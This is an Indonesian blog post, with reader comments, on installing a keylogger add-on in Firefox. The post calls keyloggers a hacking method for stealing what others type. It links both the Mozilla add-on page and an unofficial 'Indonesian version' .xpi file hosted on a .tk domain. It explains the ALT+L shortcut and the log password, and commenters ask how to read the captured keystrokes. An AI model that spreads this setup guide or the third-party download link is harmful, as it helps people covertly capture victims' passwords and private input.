Memasang Keylogger Dengan Firefox


Keylogger Pasti udah gak asing lagi di mata para hacker, Keylogger adalah sebuah perangkat baik perangkat keras atau perangkat lunak yang digunakan untuk memantau penekanan tombol keyboard. jadi Keylogger sangat berguna sekali untuk metode hacking hehe metode ini sering digukan untik mecuri data data yang sudah di ketik oleh keyboard.

Untuk Memasang Keylogger Dengan Mozilla Firefox. kita hanya Cukup add ons pada browser kita
https://addons.mozilla.org/id/firefox/addon/keylogger-220858/ [5 kb]
http://statics.nandocyber4rt.tk/keylogger-1.5-fx.xpi [versi indo]
Cara Menggunakan :
Setelah di install di browser Firefox, tekan ALT + L, lalu kita diminta password untuk membuka file log-nya, INGAT, JANGAN SAMPAI LUPA!! Karena meski sudah di uninstall addon-nya, password tetap tidak tereset/ganti pass.

Klogger ini full bekerja secara OFFLINE, jadi gak usah khawatir ada yang mau mencuri data kita.

Postingan terkait:

14 Tanggapan untuk "Memasang Keylogger Dengan Firefox"

  1. kren addonnya saya mau coba yang versi indo ah,kebetulan lagi belajar hacking nih,trimakasih untuk ilmunya,blognya kren uy

    BalasHapus
  2. Gan,,,,
    kalo mau liat hasil keylogger ny.....????

    rada' gk ngerti :D

    BalasHapus
  3. @BLOGCUNAYZ : haha kembali kasih sob :D
    @Aplikasi Why_93 : coba ALT + L terus masukin pass nya lagi, ntar langsung nongol hasil ketikkannya
    @[./Yhonezz Cyber4rt - Crew ] : masama sob

    BalasHapus
  4. wow,, bisa di coba ni,,
    mantab inponya sob :)

    BalasHapus
  5. Owwwhh......
    thanks bnget nie....

    oiya...
    thanks udh follow back.....

    BalasHapus
  6. haha mantap nhe sob... thx infonya...

    BalasHapus
  7. mantab bisa di coba gan :D

    BalasHapus
  8. tuh pas ALT + L terus masukkin password apa gan

    BalasHapus
  9. gan ambil passwordnya darimana

    BalasHapus
  10. pajai pass apa gan?

    BalasHapus
  11. pakai pass apa gan?

    BalasHapus